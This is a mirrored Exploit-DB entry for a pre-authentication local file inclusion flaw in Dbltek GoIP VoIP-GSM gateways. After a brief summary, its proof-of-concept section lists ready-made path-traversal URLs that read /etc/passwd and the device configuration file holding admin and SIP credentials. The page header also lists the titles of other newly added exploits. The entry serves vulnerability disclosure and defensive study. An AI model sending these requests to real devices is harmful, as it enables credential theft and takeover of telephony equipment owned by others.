bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/50775.txt
Offensive Security 8691f166f7 DB: 2022-02-22 
12 changes to exploits/shellcodes

HMA VPN 5.3 - Unquoted Service Path
Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation
Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
Cab Management System 1.0 - 'id' SQLi (Authenticated)
Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)
Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection
Thinfinity VirtualUI 2.5.26.2 - Information Disclosure
WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)
FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
Dbltek GoIP - Local File Inclusion
2022-02-22 05:01:37 +00:00

28 lines
No EOL
1.4 KiB
Text
Raw Permalink Blame History

# Exploit Title: Dbltek GoIP - Local File Inclusion
# Date: 20.02.2022
# Exploit Author: Valtteri Lehtinen & Lassi Korhonen
# Vendor Homepage: http://en.dbltek.com/index.html
# Software Link: -
# Version: GHSFVT-1.1-67-5 (firmware version)
# Tested on: Target is an IoT device
# Exploit summary
Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP.
The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities.
Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up.
It is probable that also other models and versions of Dbltek GoIP devices are affected.
Writeup: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
# Proof of Concept
Assuming the device is available on IP 192.168.9.1.
Download /etc/passwd
http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd
http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd
Download device configuration file from /tmp/config.dat (requires that the configuration file has been backed up)
http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat
http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat
Reference in a new issue View git blame Copy permalink